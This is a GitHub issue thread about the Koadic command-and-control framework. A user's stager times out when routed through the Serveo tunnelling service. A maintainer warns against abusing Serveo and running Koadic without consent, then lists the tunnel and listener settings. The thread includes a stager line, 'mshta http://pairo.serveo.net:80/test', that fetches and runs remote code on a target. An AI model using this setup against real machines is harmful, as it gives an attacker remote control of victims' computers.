### ISSUE TITLE
Session Timeout On remote computer

### ISSUE THREAD

**Issue by katesaikishore** [zerosum0x0/koadic#99]
I have implemented the serveo for public domain access
I have configured the port 9999 and started the trail on the remote host and the VMware host
When I try on vmware host it's working, when I try on remote host its saying timeout.
Is there any configuration error?
**This is my setup in system**
![Screenshot 2019-04-27 at 9 14 09 AM](https://user-images.githubusercontent.com/10182914/56844422-875b4200-68cd-11e9-9473-5375d6072c81.png)
**The Remote System**
![Unknown](https://user-images.githubusercontent.com/10182914/56844443-d73a0900-68cd-11e9-937c-8a31b4b8320d.jpg)
VMware System
![Screenshot 2019-04-27 at 9 22 11 AM](https://user-images.githubusercontent.com/10182914/56844456-ffc20300-68cd-11e9-8c97-62f5a39214e5.png)

**Comment by TheNaterz** [comment]
**DISCLAIMER**
The authors of Koadic strongly suggest that you do not use Serveo to route Zombies back to you outside of a pure academic use case. Here is the author of Serveo asking people (indirectly) not use his service for malware: [https://www.reddit.com/r/hacking/comments/9j1zms/how_can_i_discourage_people_from_abusing_my/](https://www.reddit.com/r/hacking/comments/9j1zms/how_can_i_discourage_people_from_abusing_my/). Please use Koadic with infrastructure that you own or have prior written consent to use. Ultimately, we can't tell you what and what not to do, but at least we can say that we tried ¯\\\_(ツ)_/¯

---
Without knowing more information, my best guess is that you're changing the stager from what Koadic is giving you in order to work with your setup.

When you started a stager, you should have seen this line:
`[!] Don't edit this URL! (See: 'help portfwd')`

This isn't a suggestion, it's a requirement for Koadic. You can read `help portfwd` for more info on why your connection is failing, but here's what you need to do to get what you want to achieve:

- `ssh -R pairo:80:localhost:80 serveo.net`
- `sudo python3 koadic` (you need to be root because you need to bind port 80)
- set SRVHOST pairo.serveo.net
- set SRVPORT 80
- set ENDPOINT test
- run

Your stager will look like `mshta http://pairo.serveo.net:80/test`. The ONLY thing you're allowed to change here is that you can remove the ':80' because http:// defaults to port 80 anyways.

**Comment by katesaikishore** [comment]
Thank you Very Much!
I will not use serveo.net for koadic :)
